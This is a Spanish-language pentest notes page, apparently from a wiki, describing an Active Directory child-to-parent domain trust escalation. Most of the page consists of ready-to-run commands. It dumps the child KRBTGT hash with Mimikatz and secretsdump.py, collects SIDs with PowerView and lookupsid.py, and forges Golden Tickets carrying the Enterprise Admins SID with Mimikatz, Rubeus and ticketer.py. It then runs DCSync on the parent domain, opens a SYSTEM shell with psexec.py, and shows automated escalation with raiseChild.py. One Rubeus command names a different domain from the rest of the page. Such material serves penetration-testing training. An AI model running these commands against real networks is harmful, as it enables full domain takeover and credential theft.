Child -> Parent Trusts

Para realizar este ataque tras comprometer un child domain, necesitamos lo siguiente:

El hash KRBTGT del child domain
El SID del child domain
El nombre de un usuario objetivo en el child domain (¡no necesita existir!)
El FQDN del child domain
El SID del grupo Enterprise Admins del root domain
Con estos datos recopilados, el ataque puede ejecutarse con Mimikatz.

from Windows

Mimikatz

Obtaining the KRBTGT Account's NT Hash using Mimikatz

En este ejemplo se nos proporciona el siguiente hash NTLM de la cuenta krbtgt: 9d765b482771505cbe97411065964d5f

.\mimikatz.exe "lsadump::dcsync /user:CHILD\krbtgt" exit

Using Get-DomainSID

El DomainSID del child domain de ejemplo que nos aparece de resultado es: S-1-5-21-2806153819-209893948-922872689

Import-Module .\PowerView.ps1
Get-DomainSID

Obtaining Enterprise Admins Group's SID using Get-DomainGroup

El SID del grupo "Enterprise Admins" del root domain de ejemplo es: S-1-5-21-3842939050-3880317879-2865463114-519

Get-DomainGroup -Domain PARENT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

En este punto, hemos recopilado los siguientes datos:

Hash KRBTGT del child domain: 9d765b482771505cbe97411065964d5f
SID del child domain: S-1-5-21-2806153819-209893948-922872689
Nombre de usuario objetivo en el child domain (¡no necesita existir!): elegimos un usuario ficticio: hacker
FQDN del child domain: CHILD.PARENT.LOCAL
SID del grupo Enterprise Admins del root domain: S-1-5-21-3842939050-3880317879-2865463114-519

Creating a Golden Ticket with Mimikatz

Generamos el Golden Ticket y ya lo tendremos en nuestra sesión actual.

.\mimikatz.exe "kerberos::golden /user:hacker /domain:CHILD.PARENT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt" exit

Rubeus

Creating a Golden Ticket using Rubeus

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Confirming the Ticket is in Memory Using klist

klist

Performing a DCSync Attack

.\mimikatz.exe "lsadump::dcsync /user:PARENT\Administrator /domain:PARENT.LOCAL" exit

from Linux

También podemos realizar el ataque mostrado en la sección anterior desde un host de ataque Linux. Para hacerlo, aún necesitaremos reunir la misma información:

El hash KRBTGT del dominio hijo
El SID del dominio hijo
El nombre de un usuario objetivo en el dominio hijo (¡no necesita existir!)
El FQDN del dominio hijo
El SID del grupo Enterprise Admins del dominio raíz

Manual Attack

Performing DCSync with secretsdump.py

En este ejemplo se nos proporciona el siguiente hash NTLM de la cuenta krbtgt: 9d765b482771505cbe97411065964d5f

secretsdump.py child.parent.local/user:'password'@192.168.14.122 -just-dc-user CHILD/krbtgt

Performing SID Brute Forcing using lookupsid.py

El DomainSID del child domain de ejemplo que nos aparece de resultado es: S-1-5-21-2806153819-209893948-922872689

lookupsid.py child.parent.local/user:'password'@192.168.14.122 | grep "Domain SID"

Grabbing the Domain SID & Attaching to Enterprise Admin's RID

El SID del grupo "Enterprise Admins" del root domain de ejemplo es: S-1-5-21-3842939050-3880317879-2865463114-519

lookupsid.py child.parent.local/user:'password'@192.168.14.5 | grep -B12 "Enterprise Admins"

Hemos reunido los siguientes datos para construir el comando de nuestro ataque. Nuevamente, usaremos el usuario inexistente hacker para forjar nuestro Golden Ticket:

El hash KRBTGT del dominio hijo: 9d765b482771505cbe97411065964d5f
El SID del dominio hijo: S-1-5-21-2806153819-209893948-922872689
El nombre del usuario objetivo en el dominio hijo: hacker
El FQDN del dominio hijo: CHILD.PARENT.LOCAL
El SID del grupo Enterprise Admins del dominio raíz: S-1-5-21-3842939050-3880317879-2865463114-519

Constructing a Golden Ticket using ticketer.py

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain CHILD.PARENT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Setting the KRB5CCNAME Environment Variable

export KRB5CCNAME=$(pwd)/hacker.ccache

Getting a SYSTEM shell using Impacket's psexec.py

psexec.py CHILD.PARENT.LOCAL/hacker@dc01.parent.local -k -no-pass -target-ip 192.168.14.5

Automatic Attack (raiseChild.py)

Impacket también incluye la herramienta raiseChild.py, que automatiza la escalada del dominio hijo al dominio padre. Necesitamos especificar el Domain Controller objetivo y las credenciales de un usuario administrativo en el dominio hijo; el script hará el resto.

raiseChild.py -target-exec 192.168.14.5 CHILD.PARENT.LOCAL/user:'password'

AnteriorAttacking Domain Trusts SiguienteCross-Forest Trust Abuse

Última actualización hace 6 meses

¿Te fue útil?